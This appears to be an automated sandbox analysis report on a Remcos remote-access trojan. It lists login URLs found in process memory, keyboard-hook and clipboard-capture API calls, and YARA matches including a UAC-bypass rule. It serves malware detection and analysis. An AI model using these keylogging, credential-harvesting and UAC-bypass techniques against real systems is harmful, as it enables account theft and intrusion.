                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765377445.0000013DBB16B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                        Source: svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLo
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806014
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                        Source: svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                        Source: svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                        Source: svchost.exe, 0000001F.00000003.1765186757.0000013DBB157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogx
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB12C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764605681.0000013DBB15A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                        Source: svchost.exe, 0000001F.00000003.1766364425.0000013DBB156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764265481.0000013DBB129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                        Source: svchost.exe, 0000001F.00000002.3658824431.0000013DBB67D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
                        Source: svchost.exe, 0000001F.00000002.3658563765.0000013DBB617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf4
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfs
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                        Source: svchost.exe, 0000001F.00000002.3657864586.0000013DBA82B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/st
                        Source: svchost.exe, 0000001F.00000002.3658163562.0000013DBA8C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657976153.0000013DBA881000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                        Source: svchost.exe, 0000001F.00000003.3655631981.0000013DBA93B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comwwCP=
                        Source: svchost.exe, 0000001F.00000002.3658207088.0000013DBA909000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1822188194.0000013DBA902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsofh
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                        Source: svchost.exe, 0000001F.00000002.3657950623.0000013DBA85F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf=
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                        Source: svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfi
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3657087544.0000013DBB14C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3655928048.0000013DBB14A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                        Source: svchost.exe, 0000001F.00000003.1765213077.0000013DBB140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765290587.0000013DBB163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                        Source: svchost.exe, 0000001F.00000003.1765488006.0000013DBB127000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                        Source: svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                        Source: svchost.exe, 0000001F.00000002.3657888158.0000013DBA845000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf/
                        Source: svchost.exe, 0000001F.00000003.1764573088.0000013DBB110000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                        Source: vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                        Source: svchost.exe, 0000001F.00000003.1765155285.0000013DBB13B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.1764689667.0000013DBB155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                        Source: vbc.exe, vbc.exe, 00000027.00000002.1818948363.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000026_2_0040A2B8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,26_2_0040B70E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,26_2_004168C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,32_2_0040987A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 32_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,32_2_004098E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,37_2_00406DFC
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 37_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,37_2_00406E9F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,39_2_004068B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 39_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,39_2_004072B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,45_2_004168C1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,26_2_0040B70E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,26_2_0040A3E0

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001A.00000002.1750545324.000000000561A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011395180.000000000053F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4014378361.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000002D.00000002.1916087250.0000000004E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000014.00000002.4011008508.0000000000507000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.4008465388.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1915952405.000001E1EDBA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2772, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5880, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 4360, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6408, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 1112, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 26_2_0041C9E2 SystemParametersInfoW,26_2_0041C9E2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 45_2_0041C9E2 SystemParametersInfoW,45_2_0041C9E2

                        System Summary

                        barindex
                        Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 26.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 45.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 45.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 11.2.svchost.exe.1e1edc9af50.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 11.2.svchost.exe.1e1edc22508.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 26.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 11.2.svchost.exe.1e1edc9af50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 11.2.svchost.exe.1e1edc22508.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000002D.00000002.1869716098.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
